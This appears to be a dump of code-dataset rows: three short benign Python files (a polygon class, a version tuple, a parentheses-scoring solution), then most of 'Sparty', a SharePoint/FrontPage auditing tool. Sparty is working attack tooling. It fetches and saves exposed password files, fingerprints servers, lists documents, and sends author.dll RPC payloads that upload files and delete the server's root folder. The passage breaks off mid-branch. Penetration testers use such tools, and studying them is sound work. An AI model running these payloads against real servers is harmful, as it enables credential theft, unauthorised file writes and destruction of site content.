content stringlengths 5 1.05M |
|---|
#! /usr/bin/env python
# coding=utf-8
#
# Copyright © 2017 Gael Lederrey <gael.lederrey@epfl.ch>
#
# Distributed under terms of the MIT license.
#
# Based on the code of Ulf Astrom (http://www.happyponyland.net)
from camogen.helpers import *
class Polygon:
"""
Set of vertices defining a surface
(Last vertex connects to first)
"""
def __init__(self, color_index=None):
"""
Constructor with the color index
:param color_index: Index of the color
"""
self.color_index = color_index
self.list_vertices = []
self.list_neighbours = []
def circumference(self):
"""
Compute the circumference of the polygon
(Sums the distance between all vertices)
:return: value for the circumference
"""
total = 0
# Number of vertices
nbr_vertices = len(self.list_vertices)
for i in range(nbr_vertices):
va = self.list_vertices[i]
vb = self.list_vertices[(i+1) % nbr_vertices]
total += dist_vertices(va, vb)
return total
def add_vertex(self, v):
"""
Add a vertex to the list of vertices
:param v: Vertex
"""
if type(v).__name__ != 'Vertex':
raise ValueError("Element should be of the class Vertex")
self.list_vertices.append(v)
def add_vertices(self, vs):
"""
Add a list of vertices to the list of vertices
:param vs: List of vertices
"""
for v in vs:
if type(v).__name__ != 'Vertex':
raise ValueError("Element should be of the class Vertex")
self.list_vertices.extend(vs)
def add_neighbour(self, idx):
"""
Add a neighbour to the list of neighbours
:param p: Index of a polygon
"""
self.list_neighbours.append(idx)
def to_string(self):
"""
Print the Polygon. For debug purpose
:return: String of the polygon
"""
return "Polygon: {" + ", ".join([v.to_string() for v in self.list_vertices]) + "}"
|
VERSION = (0, 2, 0)
|
class Solution:
def scoreOfParentheses(self, S: str) -> int:
stack, score = [], 0
for s in S:
if s == '(':
stack.append("(")
else:
last = stack[-1]
if last == '(':
stack.pop()
stack.append(1)
# nothing to match
else:
count = 0
while stack[-1] != '(':
count += stack.pop()
stack.pop()
stack.append( count*2 )
return sum(stack)
|
#!/usr/bin/env python2
# coding: utf-8
# Original code: Aditya K Sood - SecNiche Security Labs (c) 2013
# Updated/Bugfixes by: Glenn 'devalias' Grant - http://devalias.net/
# Refactorisation by: Borja R - https://www.libcrack.so/
import os
import re
import sys
import logging
import urllib2
import httplib
import requests
import optparse
from ntlm import HTTPNtlmAuthHandler
logname = "sparty"
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(logname)
# Frontend (bin) repository files
front_bin = [
'_vti_inf.html',
'_vti_bin/shtml.dll/_vti_rpc',
'_vti_bin/owssvr.dll',
'_vti_bin/_vti_adm/admin.dll',
'_vti_bin/_vti_adm/admin.exe',
'_vti_bin/_vti_aut/author.exe',
'_vti_bin/_vti_aut/WS_FTP.log',
'_vti_bin/_vti_aut/ws_ftp.log',
'_vti_bin/shtml.exe/_vti_rpc',
'_vti_bin/_vti_aut/author.dll']
front_services = [
'_vti_bin/Admin.asmx',
'_vti_bin/alerts.asmx',
'_vti_bin/dspsts.asmx',
'_vti_bin/forms.asmx',
'_vti_bin/Lists.asmx',
'_vti_bin/people.asmx',
'_vti_bin/Permissions.asmx',
'_vti_bin/search.asmx',
'_vti_bin/UserGroup.asmx',
'_vti_bin/versions.asmx',
'_vti_bin/Views.asmx',
'_vti_bin/webpartpages.asmx',
'_vti_bin/webs.asmx',
'_vti_bin/spsdisco.aspx',
'_vti_bin/AreaService.asmx',
'_vti_bin/BusinessDataCatalog.asmx',
'_vti_bin/ExcelService.asmx',
'_vti_bin/SharepointEmailWS.asmx',
'_vti_bin/spscrawl.asmx',
'_vti_bin/spsearch.asmx',
'_vti_bin/UserProfileService.asmx',
'_vti_bin/WebPartPages.asmx']
# Frontend (pvt) repository files
front_pvt = [
'_vti_pvt/authors.pwd',
'_vti_pvt/administrators.pwd',
'_vti_pvt/users.pwd',
'_vti_pvt/service.pwd',
'_vti_pvt/service.grp',
'_vti_pvt/bots.cnf',
'_vti_pvt/service.cnf',
'_vti_pvt/access.cnf',
'_vti_pvt/writeto.cnf',
'_vti_pvt/botsinf.cnf',
'_vti_pvt/doctodep.btr',
'_vti_pvt/deptodoc.btr',
'_vti_pvt/linkinfo.cnf',
'_vti_pvt/services.org',
'_vti_pvt/structure.cnf',
'_vti_pvt/svcacl.cnf',
'_vti_pvt/uniqperm.cnf',
'_vti_pvt/service/lck',
'_vti_pvt/frontpg.lck']
# Sharepoint and Frontend (directory) repository
directory_check = [
'_vti_pvt/',
'_vti_bin/',
'_vti_log/',
'_vti_cnf/',
'_vti_bot',
'_vti_bin/_vti_adm',
'_vti_bin/_vti_aut',
'_vti_txt/']
# Sharepoint repository files
sharepoint_check_layout = [
'_layouts/aclinv.aspx',
'_layouts/addrole.aspx',
'_layouts/AdminRecycleBin.aspx',
'_layouts/AreaNavigationSettings.aspx',
'_Layouts/AreaTemplateSettings.aspx',
'_Layouts/AreaWelcomePage.aspx',
'_layouts/associatedgroups.aspx',
'_layouts/bpcf.aspx',
'_Layouts/ChangeSiteMasterPage.aspx',
'_layouts/create.aspx',
'_layouts/editgrp.aspx',
'_layouts/editprms.aspx',
'_layouts/groups.aspx',
'_layouts/help.aspx',
'_layouts/images/',
'_layouts/listedit.aspx',
'_layouts/ManageFeatures.aspx',
'_layouts/ManageFeatures.aspx',
'_layouts/mcontent.aspx',
'_layouts/mngctype.aspx',
'_layouts/mngfield.aspx',
'_layouts/mngsiteadmin.aspx',
'_layouts/mngsubwebs.aspx',
'_layouts/mngsubwebs.aspx?view=sites',
'_layouts/mobile/mbllists.aspx',
'_layouts/MyInfo.aspx',
'_layouts/MyPage.aspx',
'_layouts/MyTasks.aspx',
'_layouts/navoptions.aspx',
'_layouts/NewDwp.aspx',
'_layouts/newgrp.aspx',
'_layouts/newsbweb.aspx',
'_layouts/PageSettings.aspx',
'_layouts/people.aspx',
'_layouts/people.aspx?MembershipGroupId=0',
'_layouts/permsetup.aspx',
'_layouts/picker.aspx',
'_layouts/policy.aspx',
'_layouts/policyconfig.aspx',
'_layouts/policycts.aspx',
'_layouts/Policylist.aspx',
'_layouts/prjsetng.aspx',
'_layouts/quiklnch.aspx',
'_layouts/recyclebin.aspx',
'_Layouts/RedirectPage.aspx',
'_layouts/role.aspx',
'_layouts/settings.aspx',
'_layouts/SiteDirectorySettings.aspx',
'_layouts/sitemanager.aspx',
'_layouts/SiteManager.aspx?lro=all',
'_layouts/spcf.aspx',
'_layouts/storman.aspx',
'_layouts/themeweb.aspx',
'_layouts/topnav.aspx',
'_layouts/user.aspx',
'_layouts/userdisp.aspx',
'_layouts/userdisp.aspx?ID=1',
'_layouts/useredit.aspx',
'_layouts/useredit.aspx?ID=1',
'_layouts/viewgrouppermissions.aspx',
'_layouts/viewlsts.aspx',
'_layouts/vsubwebs.aspx',
'_layouts/WPPrevw.aspx?ID=247',
'_layouts/wrkmng.aspx']
sharepoint_check_forms = [
'Forms/DispForm.aspx',
'Forms/DispForm.aspx?ID=1',
'Forms/EditForm.aspx',
'Forms/EditForm.aspx?ID=1',
'Forms/Forms/AllItems.aspx',
'Forms/MyItems.aspx',
'Forms/NewForm.aspx',
'Pages/default.aspx',
'Pages/Forms/AllItems.aspx']
sharepoint_check_catalog = [
'_catalogs/masterpage/Forms/AllItems.aspx',
'_catalogs/wp/Forms/AllItems.aspx',
'_catalogs/wt/Forms/Common.aspx']
password_files = [
'_vti_pvt/service.pwd',
'_vti_pvt/administrators.pwd',
'_vti_pvt/authors.pwd']
refine_target = []
pvt_target = []
dir_target = []
sharepoint_target_layout = []
sharepoint_target_forms = []
sharepoint_target_catalog = []
def check_python():
"""
Checks if the script is being run using python v3
"""
version = sys.version_info
if version[:2][0] == 3:
logger.error("Python3 not supported")
sys.exit(1)
def banner():
print("\t---------------------------------------------------------------")
sparty_banner = """
_|_|_| _|_|_| _|_| _|_|_| _|_|_|_|_| _| _|
_| _| _| _| _| _| _| _| _| _|
_|_| _|_|_| _|_|_|_| _|_|_| _| _|
_| _| _| _| _| _| _| _|
_|_|_| _| _| _| _| _| _| _|
SPARTY : Sharepoint/Frontpage Security Auditing Tool
Authored by: Aditya K Sood | {0kn0ck}@secniche.org | @AdityaKSood | 2013
Updated by: Borja R | borja@libcrack.so | @borjiviri | 2015
Powered by: SecNiche Security Labs | 2013
Backed by: Pentest Limited | 2015
"""
print(sparty_banner)
print("\t--------------------------------------------------------------")
def usage(destination):
"""
Usage information
"""
print(
"[scanning access permissions in forms directory - sharepoint] %s -s forms -u %s " %
(sys.argv[0], destination))
print(
"[scanning access permissions in frontpage directory - frontpage] %s -f pvt -u %s " %
(sys.argv[0], destination))
print("[dumping passwords] %s -d dump -u %s " % (sys.argv[0], destination))
print("[note] : please take this into consideration")
print("\t\t: (1) always specify https | http explicitly")
print("\t\t: (2) always provide the proper directory structure where sharepoint/frontpage is installed")
print("\t\t: (3) do not specify '/' at the end of url")
def build_target(target, front_dirs=[], refine_target=[]):
"""
Build target for scanning frontpage and sharepoint files
"""
for item in front_dirs:
refine_target.append(target + "/" + item)
def success(module_name):
"""
Display success notification
"""
logger.info("\n[+] check for HTTP codes (200) for active list of accessible files or directories (404) - Not exists | (403) - Forbidden (500) - Server Error")
logger.info("\n[+] (%s) - module executed successfully\n" % module_name)
def target_information(url):
"""
Extract information about target's enviornment
"""
logger.info(
"[+] fetching information from the given target : (%s)" %
(url))
try:
r = requests.get(url)
logger.info(
"[+] target responded with HTTP code: (%s)" %
r.status_code)
logger.info("[+] target is running server: (%s)" % r.headers["server"])
except urllib2.HTTPError as h:
logger.info("[-] url error occured - (%s)" % h.code)
pass
def audit(target=[]):
"""
Scan for common frontpage/sharepoint files
"""
for element in target:
try:
handle = urllib2.urlopen(element)
info = handle.info()
response_code = handle.getcode()
logger.info("[+] (%s) - (%d)" % (element, response_code))
except urllib2.HTTPError as h:
logger.info("[-] (%s) - (%d)" % (element, h.code))
except httplib.BadStatusLine:
logger.info("[-] server responds with bad status")
pass
def dump_credentials(dest):
"""
Dump frontpage service and administrators password files if present
"""
password_targets = []
for item in password_files:
password_targets.append(dest + "/" + item)
for entry in password_targets:
try:
handle = urllib2.urlopen(entry)
if handle.getcode() == 200:
logger.info(
"[+] dumping contents of file located at : (%s)" %
(entry))
filename = "__dump__.txt"
dump = open(filename, 'a')
dump.write(handle.read())
logger.info(handle.read())
except urllib2.HTTPError as h:
logger.info(
"[-] could not dump the file located at : (%s) | (%d)" %
(entry, h.code))
continue
except httplib.BadStatusLine:
logger.info("[-] server responds with bad status")
continue
logger.info(
"[*] ---------------------------------------------------------------------------------------")
logger.info("[+] check the (%s) file if generated\n" % (filename))
def fingerprint_frontpage(name):
"""
Fingerprint frontpage version using default files
"""
enum_nix = [
'_vti_bin/_vti_aut/author.exe',
'_vti_bin/_vti_adm/admin.exe',
'_vti_bin/shtml.exe']
enum_win = [
'_vti_bin/_vti_aut/author.dll',
'_vti_bin/_vti_aut/dvwssr.dll',
'_vti_bin/_vti_adm/admin.dll',
'_vti_bin/shtml.dll']
build_enum_nix = []
build_enum_win = []
for item in enum_nix:
build_enum_nix.append(name + "/" + item)
for entry in build_enum_nix:
try:
info = urllib2.urlopen(entry)
if info.getcode() == 200:
logger.info(
"[+] front page is tested as : nix version | (%s) | (%d)" %
(entry, info.getcode()))
except urllib2.HTTPError:
pass
for item in enum_win:
build_enum_win.append(name + "/" + item)
for entry in build_enum_win:
try:
info = urllib2.urlopen(entry)
if info.getcode() == 200:
logger.info(
"[+] front page is tested as : windows version | (%s) | (%d)" %
(entry, info.getcode()))
except urllib2.HTTPError:
logger.info(
"[-] failed to extract the version of frontpage from default file!")
pass
except httplib.BadStatusLine:
logger.info("[-] server responds with bad status")
pass
frontend_version = name + "/_vti_inf.html"
try:
version = urllib2.urlopen(frontend_version)
logger.info(
"[+] extracting frontpage version from default file : (%s):" %
re.findall(
r'FPVersion=(.*)',
version.read()))
except urllib2.HTTPError:
logger.error(
"[-] failed to extract the version of frontpage from default file")
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
logger.info(
"[*] ---------------------------------------------------------------------------------------")
# dump sharepoint headers for version fingerprinting
def dump_sharepoint_headers(name):
"""
dump sharepoint headers for version fingerprint
"""
try:
dump_s = urllib2.urlopen(name)
logger.info(
"[+] configured sharepoint version is : (%s)" %
dump_s.info()['microsoftsharepointteamservices'])
except KeyError:
logger.error(
"[-] sharepoint version could not be extracted using HTTP header : MicrosoftSharepointTeamServices")
try:
dump_f = urllib2.urlopen(name)
logger.info(
"[+] sharepoint is configured with load balancing capability : (%s)" %
dump_f.info()['x-sharepointhealthscore'])
except KeyError:
logger.error(
"[-] sharepoint load balancing ability could not be determined using HTTP header : X-SharepointHealthScore")
try:
dump_g = urllib2.urlopen(name)
logger.info(
"[+] sharepoint is configured with explicit diagnosis (GUID based log analysis) purposes : (%s)" %
dump_f.info()['sprequestguid'])
except KeyError:
logger.error(
"[-] sharepoint diagnostics ability could not be determined using HTTP header : SPRequestGuid")
except urllib2.HTTPError:
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
# file uploading routine to upload file remotely on frontpage extensions
def frontpage_rpc_check(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
exp_target_list = [
'_vti_bin/shtml.exe/_vti_rpc',
'_vti_bin/shtml.dll/_vti_rpc']
data = "method= server version"
# data="method=list+services:4.0.2.0000&service_name="
# for item in exploit_targets:
for item in exp_target_list:
destination = name + "/" + item
logger.info(
"[+] Sending HTTP GET request to - (%s) for verifying whether RPC is listening" %
destination)
try:
req = urllib2.Request(destination)
response = urllib2.urlopen(req)
if response.getcode() == 200:
logger.info(
"[+] target is listening on frontpage RPC - (%s)\n" %
response.getcode())
else:
logger.info(
"[-] target is not listening on frontpage RPC - (%s)\n" %
response.getcode())
except urllib2.URLError as e:
logger.error("[-] url error, code: %s" % e.code)
pass
except httplib.BadStatusLine as h:
logger.error("[-] server responds with bad status")
pass
logger.info(
"[+] Sending HTTP POST request to retrieve software version - (%s)" %
destination)
try:
req = urllib2.Request(destination, data, headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
logger.info(
"[+] target accepts the request - (%s) | (%s)\n" %
(data, response.getcode()))
filename = "__version__.txt" + ".html"
version = open(filename, 'a')
version.write(response.read())
logger.info("[+] check file for contents - (%s) \n" % filename)
else:
logger.info(
"[-] target fails to accept request - (%s) | (%s)\n" %
(data, response.getcode()))
except urllib2.URLError as e:
logger.error(
"[-] url error, seems like authentication is required or server failed to handle request - %s" %
e.code)
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
logger.info(
"[*] ---------------------------------------------------------------------------------------")
def frontpage_service_listing(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
service_target_list = [
'_vti_bin/shtml.exe/_vti_rpc',
'_vti_bin/shtml.dll/_vti_rpc']
data = [
'method=list+services:3.0.2.1076&service_name=',
'method=list+services:4.0.2.471&service_name=',
'method=list+services:4.0.2.0000&service_name=',
'method=list+services:5.0.2.4803&service_name=',
'method=list+services:5.0.2.2623&service_name=',
'method=list+services:6.0.2.5420&service_name=']
for item in service_target_list:
destination = name + "/" + item
logger.info(
"[+] Sending HTTP POST request to retrieve service listing - (%s)" %
destination)
try:
for entry in data:
req = urllib2.Request(destination, entry, headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
logger.info(
"[+] target accepts the request - (%s) | (%s)" %
(entry, response.getcode()))
filename = "__service-list__.txt" + entry + ".html"
service_list = open(filename, 'a')
service_list.write(response.read())
logger.info("[+] check file for contents - (%s) \n" % filename)
else:
logger.info(
"[-] target fails to accept request - (%s) | (%s)\n" %
(data, response.getcode()))
except urllib2.URLError as e:
logger.error(
"[-] url error, seems like authentication is required or server failed to handle request - %s" %
e.code)
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
logger.info(
"[*] ---------------------------------------------------------------------------------------")
def frontpage_config_check(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
# running some standard commands to retrieve files and configuration checks
# frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803, 5.0.2.2623 , 6.0.2.5420
# version : major ver=n.minor ver=n.phase ver=n.verincr=v
front_exp_target = '_vti_bin/_vti_aut/author.dll'
payloads = [
'method=open service:3.0.2.1706&service_name=/',
'method=list documents:3.0.2.1706&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
'method=getdocument:3.0.2.1105&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
'method=open service:4.0.2.4715&service_name=/',
'method=list documents:4.0.2.4715&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
'method=getdocument:4.0.2.4715&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
'method=open service:5.0.2.4803&service_name=/',
'method=list documents:5.0.2.4803&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
'method=getdocument:5.0.2.4803&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
'method=open service:5.0.2.2623&service_name=/',
'method=list documents:5.0.2.2623&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
'method=getdocument:5.0.2.2623&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=',
'method=open service:6.0.2.5420&service_name=/',
'method=list documents:6.0.2.5420&service_name=&listHiddenDocs=false&listExplorerDocs=false&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=false&listIncludeParent=true&listDerivedT=false&listBorders=false&initialUrl=',
'method=getdocument:6.0.2.5420&service_name=&document_name=about/default.htm&old_theme_html=false&force=true&get_option=none&doc_version=']
for item in payloads:
destination = name + "/" + front_exp_target
logger.info(
"[+] Sending HTTP POST request to [open service | listing documents] - (%s)" %
destination)
try:
req = urllib2.Request(destination, item, headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
logger.info(
"[+] target accepts the request - (%s) | (%s)\n" %
(item, response.getcode()))
filename = "__author-dll-config__.txt" + ".html"
service_list = open(filename, 'a')
service_list.write(response.read())
logger.info("[+] check file for contents - (%s) \n" % filename)
else:
logger.info(
"[-] target fails to accept request - (%s) | (%s)\n" %
(item, response.getcode()))
except urllib2.URLError as e:
logger.error(
"[-] url error, seems like authentication is required or server failed to handle request - %s \n[-] payload [%s]\n" %
(e.code, item))
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
def frontpage_remove_folder(name):
"""
Remove specific folder from the web server
"""
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
# running some standard commands to remove "/" folder from the web server using author.dll
# frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803,
# 5.0.2.2623 , 6.0.2.5420
file_exp_target = '_vti_bin/_vti_aut/author.dll'
payloads = [
'method=remove+documents:3.0.2.1786&service_name=/',
'method=remove+documents:4.0.2.4715&service_name=/',
'method=remove+documents:5.0.3.4803&service_name=/',
'method=remove+documents:5.0.2.4803&service_name=/',
'method=remove+documents:6.0.2.5420&service_name=/']
for item in payloads:
destination = name + "/" + file_exp_target
logger.info(
"[+] Sending HTTP POST request to remove '/' directory to - (%s)" %
destination)
try:
req = urllib2.Request(destination, item, headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
logger.info(
"[+] folder removed successfully - (%s) | (%s)\n" %
(item, response.getcode()))
for line in response.readlines():
logger.info(line)
else:
logger.error(
"[-] fails to remove '/' folder at - (%s) | (%s)\n" %
(item, response.getcode()))
except urllib2.URLError as e:
logger.error(
"[-] url error, seems like authentication is required or server failed to handle request - %s \n[-] payload [%s]\n" %
(e.code, item))
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
# file uploading through author.dll
def file_upload_check(name):
headers = {
'MIME-Version': '4.0',
'User-Agent': 'MSFrontPage/4.0',
'X-Vermeer-Content-Type': 'application/x-www-form-urlencoded',
'Connection': 'Keep-Alive'}
# running some standard commands to upload file to web server using author.dll
# frontpage versions validated are: 3.0.2.1706 , 4.0.2.4715 , 5.0.2.4803,
# 5.0.2.2623 , 6.0.2.5420
os.system("echo 'Sparty Testing' > sparty.txt")
file_exp_target = '_vti_bin/_vti_aut/author.dll'
payloads = [
'method=put document:3.0.2.1706&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
'method=put document:4.0.2.4715&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
'method=put document:5.0.2.2623&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
'method=put document:5.0.2.4823&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false',
'method=put document:6.0.2.5420&service_name=&document=[document_name=sparty.txt ; meta_info=[]]&put_option=overwrite&comment=&keep_checked_out=false']
for item in payloads:
destination = name + "/" + file_exp_target
logger.info(
"[+] Sending HTTP POST request for uploading file to - (%s)" %
destination)
try:
req = urllib2.Request(destination, item, headers)
response = urllib2.urlopen(req)
if response.getcode() == 200:
logger.info(
"[+] file uploaded successfully - (%s) | (%s)\n" %
(item, response.getcode()))
for line in response.readlines():
logger.info(line)
else:
logger.error(
"[-] file fails to upload at - (%s) | (%s)\n" %
(item, response.getcode()))
except urllib2.URLError as e:
logger.error(
"[-] url error, seems like authentication is required or server failed to handle request - %s \n[-] payload [%s]\n" %
(e.code, item))
pass
except httplib.BadStatusLine:
logger.error("[-] server responds with bad status")
pass
def enable_ntlm_authentication(user="", password="", url=""):
"""
NTLM Authentication routine (implemented by devalias.net)
"""
logger.info("[+][devalias.net] Enabling NTLM authentication support")
try:
from urlparse import urlparse, urlunparse
except ImportError:
logger.error(
"[-][devalias.net][NTLM Authentication] Program could not find module : urlparse")
sys.exit(2)
if user == "":
user = raw_input("[+][devalias.net][NTLM Authentication] Enter username (DOMAIN\username): ")
if password == "":
password = raw_input(
"[+][devalias.net][NTLM Authentication] Enter password: ")
parsed_url = urlparse(url)
base_uri = urlunparse((parsed_url[0], parsed_url[1], "", "", "", ""))
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, base_uri, user, password)
# create the NTLM authentication handler
auth_NTLM = HTTPNtlmAuthHandler.HTTPNtlmAuthHandler(passman)
# other authentication handlers
auth_basic = urllib2.HTTPBasicAuthHandler(passman)
auth_digest = urllib2.HTTPDigestAuthHandler(passman)
# disable proxies (if you want to stay within the corporate network)
# proxy_handler = urllib2.ProxyHandler({})
proxy_handler = urllib2.ProxyHandler()
# create and install the opener
opener = urllib2.build_opener(
proxy_handler,
auth_NTLM,
auth_digest,
auth_basic)
urllib2.install_opener(opener)
logger.info(
"[+][devalias.net][NTLM authentication] Credentials enabled for " +
user)
def main():
"""
Main routine
"""
check_python()
banner()
parser = optparse.OptionParser(
usage="usage: %prog [options]",
version="%prog 1.0")
front_page = optparse.OptionGroup(parser, "Frontpage:")
share_point = optparse.OptionGroup(parser, "Sharepoint:")
mandatory = optparse.OptionGroup(parser, "Mandatory:")
exploit = optparse.OptionGroup(
parser,
"Information Gathering and Exploit:")
authentication = optparse.OptionGroup(
parser,
"Authentication [devalias.net]")
general = optparse.OptionGroup(parser, "General:")
mandatory.add_option(
"-u",
"--url",
type="string",
help="target url to scan with proper structure",
dest="url")
front_page.add_option(
"-f",
"--frontpage",
type="choice",
choices=[
'pvt',
'bin'],
help="<FRONTPAGE = pvt | bin> -- to check access permissions on frontpage standard files in vti or bin directory",
dest="frontpage")
share_point.add_option(
"-s",
"--sharepoint",
type="choice",
choices=[
'forms',
'layouts',
'catalog'],
help="<SHAREPOINT = forms | layouts | catalog> -- to check access permissions on sharepoint standard files in forms or layouts or catalog directory",
dest="sharepoint")
exploit.add_option(
"-v",
"--http_fingerprint",
type="choice",
choices=[
'ms_sharepoint',
'ms_frontpage'],
help="<FINGERPRINT = ms_sharepoint | ms_frontpage> -- fingerprint sharepoint or frontpage based on HTTP headers",
dest="fingerprint")
exploit.add_option(
"-d",
"--dump",
type="choice",
choices=[
'dump',
'extract'],
help="<DUMP = dump | extract> -- dump credentials from default sharepoint and frontpage files (configuration errors and exposed entries)",
dest="dump")
exploit.add_option(
"-l",
"--list",
type="choice",
choices=[
'list',
'index'],
help="<DIRECTORY = list | index> -- check directory listing and permissions",
dest="directory")
exploit.add_option(
"-e",
"--exploit",
type="choice",
choices=[
'rpc_version_check',
'rpc_service_listing',
'author_config_check',
'rpc_file_upload',
'author_remove_folder'],
help="EXPLOIT = <rpc_version_check | rpc_service_listing | rpc_file_upload | author_config_check | author_remove_folder> -- exploit vulnerable installations by checking RPC querying, service listing and file uploading",
dest="exploit")
exploit.add_option(
"-i",
"--services",
type="choice",
choices=['serv',
'services'],
help="SERVICES = <serv | services> -- checking exposed services",
dest="services")
authentication.add_option(
"-a",
"--auth-type",
type="choice",
choices=['ntlm'],
help="AUTHENTICATION = <ntlm> -- Authenticate with NTLM user/pass",
dest="authentication")
general.add_option(
"-x",
"--examples",
type="string",
help="running usage examples",
dest="examples")
parser.add_option_group(front_page)
parser.add_option_group(share_point)
parser.add_option_group(mandatory)
parser.add_option_group(exploit)
parser.add_option_group(authentication)
parser.add_option_group(general)
options, arguments = parser.parse_args()
try:
target = options.url
# devalias.net - Authentication
if options.authentication == "ntlm":
enable_ntlm_authentication(
"",
"",
target) # Leave user/pass blank to prompt user
# TODO: Enable commandline user/pass?
if target is not None:
target_information(target)
else:
logger.info("[-] specify the options. use (-h) for more help")
sys.exit(0)
if options.loglevel:
logger.setLevel(options.loglevel)
else:
logger.setLevel(logging.DEBUG)
if options.dump == "dump" or options.dump == "extract":
logger.info(
"\n[+]------------------------------------------------------------------------------------------------")
logger.info(
"[+] dumping (service.pwd | authors.pwd | administrators.pwd | ws_ftp.log) files if possible")
logger.info(
"[+]--------------------------------------------------------------------------------------------------\n")
dump_credentials(target)
success("password dumping")
return
elif options.exploit == "rpc_version_check":
logger.info(
"\n[+]-----------------------------------------------------------------------")
logger.info(
"[+] auditing frontpage RPC service ")
logger.info(
"[+]-------------------------------------------------------------------------\n")
frontpage_rpc_check(target)
success("module RPC version check")
return
elif options.exploit == "rpc_service_listing":
logger.info(
"\n[+]-----------------------------------------------------------------------")
logger.info(
"[+] auditing frontpage RPC service for fetching listing ")
logger.info(
"[+]-------------------------------------------------------------------------\n")
frontpage_service_listing(target)
success("module RPC service listing check")
return
elif options.exploit == "author_config_check":
logger.info(
"\n[+]-----------------------------------------------------------------------")
logger.info(
"[+] auditing frontpage configuration settings ")
logger.info(
"[+]-------------------------------------------------------------------------\n")
frontpage_config_check(target)
success("module RPC check")
return
elif options.exploit == "author_remove_folder":
logger.info(
"\n[+]-----------------------------------------------------------------------")
logger.info(
"[+] trying to remove folder from web server ")
logger.info(
"[+]-------------------------------------------------------------------------\n")
frontpage_remove_folder(target)
success("module remove folder check")
return
elif options.exploit == "rpc_file_upload":
logger.info(
"\n[+]-----------------------------------------------------------------------")
logger.info(
"[+] auditing file uploading misconfiguration ")
logger.info(
"[+]-------------------------------------------------------------------------\n")
file_upload_check(target)
success("module file upload check")
return
elif options.examples == "examples":
usage(target)
return
elif options.directory == "list" or options.directory == "index":
build_target(target, directory_check, dir_target)
logger.info(
"\n[+]-----------------------------------------------------------------------")
logger.info(
"[+] auditing frontpage directory permissions (forbidden | index | not exist)")
logger.info(
"[+]-------------------------------------------------------------------------\n")
audit(dir_target)
success("directory check")
return
elif options.frontpage == "bin":
build_target(target, front_bin, refine_target)
logger.info("\n[+]----------------------------------------")
logger.info("[+] auditing frontpage '/_vti_bin/' directory")
logger.info("[+]------------------------------------------\n")
audit(refine_target)
success("bin file access")
elif options.frontpage == "pvt":
build_target(target, front_pvt, pvt_target)
logger.info(
"\n[+]---------------------------------------------------------")
logger.info(
"[+] auditing '/_vti_pvt/' directory for sensitive information ")
logger.info(
"[+]-----------------------------------------------------------\n")
audit(pvt_target)
success("pvt file access")
return
elif options.fingerprint == "ms_sharepoint":
dump_sharepoint_headers(target)
logger.info("\n[+] sharepoint fingerprint module completed\n")
return
elif options.fingerprint == "ms_frontpage":
fingerprint_frontpage(target)
logger.info("\n[+] frontpage fingerprint module completed\n")
return
elif options.sharepoint == "layouts":
build_target(
target,
sharepoint_check_layout,
sharepoint_target_layout)
logger.info(
"\n[+]-----------------------------------------------------------------")
logger.info(
"[+] auditing sharepoint '/_layouts/' directory for access permissions ")
logger.info(
"[+]-------------------------------------------------------------------\n")
audit(sharepoint_target_layout)
success("layout file access")
return
elif options.sharepoint == "forms":
build_target(
target,
sharepoint_check_forms,
sharepoint_target_forms)
logger.info(
"\n[+]--------------------------------------------------------------")
logger.info(
"[+] auditing sharepoint '/forms/' directory for access permissions ")
logger.info(
"[+]----------------------------------------------------------------\n")
audit(sharepoint_target_forms)
success("forms file access")
return
elif options.sharepoint == "catalog":
build_target(
target,
sharepoint_check_catalog,
sharepoint_target_catalog)
